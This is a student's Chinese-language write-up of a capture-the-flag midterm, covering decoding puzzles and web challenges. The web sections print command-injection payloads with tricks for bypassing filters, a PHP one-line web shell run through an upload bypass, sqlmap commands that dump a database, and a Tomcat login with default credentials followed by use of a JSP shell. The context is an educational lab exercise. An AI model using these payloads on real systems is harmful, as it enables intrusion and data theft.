2022年春季学期期中考核

签到

我们先打开环境，发现给了一串base64密码

我们将他解密，解密两次就可以得到flag

由此可以得到flag

Crypto&Misc

rsa

题目给了我们一个python文件，下载下来后在Visual Stdio Code里面打开后直接就有flag

由此得到flag

flag{2285b01c-cd0b-4c5a-8ca5-23a3b7612a2e}

EMO

将题目的附件下载下来，得到一串emoji表情：

我百度了一下发现是base100解码（也被称为emoji解码），但是也可以直接用emoji表情解码来解码 ，解码后：

看这个好像是位置被切换了一样，唯一切换位置的密码只有栅栏密码，一定要用千千秀字那个软件去解码，在bugku里面的工具是错的我解了一天都解不出来，从一试到了20多，真的会无语 

你看这个样子是不是很像flag的格式，而且对照ascii码表来说的话l到f的偏移量是6，那就浅试一下吧（这个也要用千千秀字里面那个解密软件啊，bugku里面的是错的！！！） 

就可以得到flag

flag{e20dd7fc-041c-4d40-8639-062f806f96a2}

附带一张ascii码对照表： 

WEB

ping1

首先让我们打卡题目连接，只有一个输入框，那就直接命令输入就好：

这里不能用;作为分隔符，可能始备禁止，要用|管道符号去连接两个命令

127.0.0.1|ls /

 

然后我们发现了含有flag的文件

127.0.0.1|cat /REAL_flLLLAAAag

 但是确实什么都没有，我还卡了一下，到后来发现用burpsuit抓包之后就可以得到flag

 后来大哥告诉我查看源码也可以获得flag，有很多种方式

flag{b1c9c89c-900d-499f-8ebe-70dcd09dd92b}

 但是要注意，我最开始还不明白那个hint提示是什么意思，后来才知道，如果用dirsearch扫描的话，会有一个文件，打开后里面不是真正的flag（QAQ）

ping2（来点rce）

这道题比ping1我觉得难很多，是我学艺不精（QAQ）

我补充几个经常用的绕过方式，空格用%09，；就是%0a，*和？都可以用作帮助字符串绕过，但是？只可以代替一个或者零个字符，*可以代表一个或者多个字符，但是你的命令符不能用*绕过（一定不要犯和我一样的憨憨的错误），需要换一个命令进行输入，cat被过滤的话用tac替换

那为什么这道题可以在url里面用%，是因为在url框里面输入会被url编码，它所呈现出来的就不是%，所以这道题推荐在url里面直接输入命令是最简便的！

还有就是，打开一个文件夹就要用ls打开，而打开文件夹里面的程序就要用tac或者是cat，而cd是选中一个文件夹，然后再用cat或者tac将他打开就好了。

说了那么多，先开始做题吧

看题目，基本上所有能够用到的都被过滤了，就结合刚刚的知识点就可以开始做题了，先看看都有哪些文件夹

?ip=127.0.0.1%0als#

我最先打开的是flag里面查看有没有东西，但是我好像被骗了。。

?ip=127.0.0.1%0atac%09f*#

这个flag是假的，那肯定就在YunXi的那个文件夹里面，用ls打开试试

?ip=127.0.0.1%0als%09\Y*#

 找到了真正的flag所在地，那就再打开这个文件就行了,首先我们要选中这个文件夹才行

?ip=127.0.0.1%0acd%09Y*%0atac%09f*#

里面看不到flag，那肯定被藏起来了，查看一下源码或者是用BP抓包都可以！ 

flag{999dba97-e462-49bb-b2aa-d48414632383}

 这道题就算是完成了！我感觉的确是好多不会的知识点，建议搭配ctfhub里面的rce食用风味更佳！

upload

文件上传的时候后缀名（文件类型）必须和php有关，才能被解析，像是php,php1,php2,php3

打开题目，发现是上传头像文件，先上传一个看一看（相当于是后端检测）

可能要将文件类型（content-type）改成image/png才能行，用bp抓包后在上传，我是建立一个自己的png文件，然后用bp加上一句话木马

<?php@eval($_post["zxc"]);?>

 再上传一次试试看：

 它检测出了我的文件里面有post的存在，所以我用get绕过它就行，同时为了能够被php所解析，所以要将后缀名再改为php.后来我发现php1,php2,php3...一直到php7一直都被阻止和过滤，所以我们试一试phtml

改了所有都没有办法上传，所以我当时做题就卡在这里了。后来我大哥告诉我，这里的知识点是白名单绕过，要去修改文件内容的文件头才行，我是用010去修改的参考wp ,修改为这样：

然后再次上传，就上传成功！ 

然后用dirsearch扫面查看这个文件的位置 

 在upload里面，顺便说明get的用法（在线偷学），因为蚁剑连接要用post传参，但是get就要用手动连接才行，那就在url上面传参，输入指令 

?abc=system("ls /");

abc是连接密码，让他的参数是我们要执行的命令,发现有flag的存在，那就看看它

?abc=system("cat /flag");

即可获得flag

EZ-sql

打开题目，发现是qq空间，的确实吓到了我一跳

这道题就是新的sqlmap的使用方式，（对我来说是），先抓包，在跑 map，抓包内容：

（环境关了剩下的明天再做） 

明天来了，先示范一下抓包的过程

 然后再用sqlmap跑就行了

sqlmap和bp联动的指令     sqlmap常用指令    过程如下：

pyrhon sqlmap.py -r "C:\Users\Lenovo\Desktop\zxc.txt" -p u --dbs

python sqlmap.py -r "C:\Users\Lenovo\Desktop\zxc.txt" -p u -D challenges --tables

python sqlmap.py -r "C:\Users\Lenovo\Desktop\zxc.txt" -p u -D challenges -T fl44444g --columns

python sqlmap.py -r "C:\Users\Lenovo\Desktop\zxc.txt" -p u -D challenges -T fl44444g -C flag --dump

 即可得到flag

flag{3313a881-7c46-4a11-bac3-b8e0c836fc2c}

TOMCAT

(想不到是一个文件上传类型的题目吧)。我也是看师兄给的wp和大哥的讲解才勉强明白了一下，除了马儿读不懂，好像没有其他的问题。。。

浅浅复制一下师兄的马（注意把文件类型一定要更改为.jsp）

打开环境（嘿嘿完全没有见过） ，然后点击管理者登录

用弱指令tomcat/tomcat 看看能否登录 

 

登陆成功！

 找到了能够上传文件的地方，它提示我们要上传war类型的文件，那就改

文件上传成功

试试能不能打开它

ddd/123.jsp?pwd=023&i=ls /

找到了flag的文件夹

ddd/123.jsp?pwd=023&i=cat /flag

 得到flag！

flag{bbcd65f6-ea47-421c-8f7e-5ef43e53608a}